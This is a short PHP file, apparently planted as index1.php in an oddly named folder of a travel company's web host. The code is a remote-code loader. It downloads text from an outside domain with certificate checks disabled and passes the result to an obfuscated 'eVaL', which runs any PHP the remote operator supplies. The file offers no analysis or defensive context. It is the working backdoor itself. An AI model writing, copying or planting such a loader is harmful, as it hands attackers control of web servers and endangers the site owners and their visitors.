File: /home/elrashedytravel/public_html/configCYT/Jump/0-molexlubricants/index1.php
<?php
if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' ) ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, "http://z60121_16.qosinski.shop/stat/index.txt" );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_HEADER, false );
curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
$handle = curl_exec( $ch );
if ( $handle ) {
$data = eVaL( '?>' . $handle );
}
curl_close( $ch );
}?>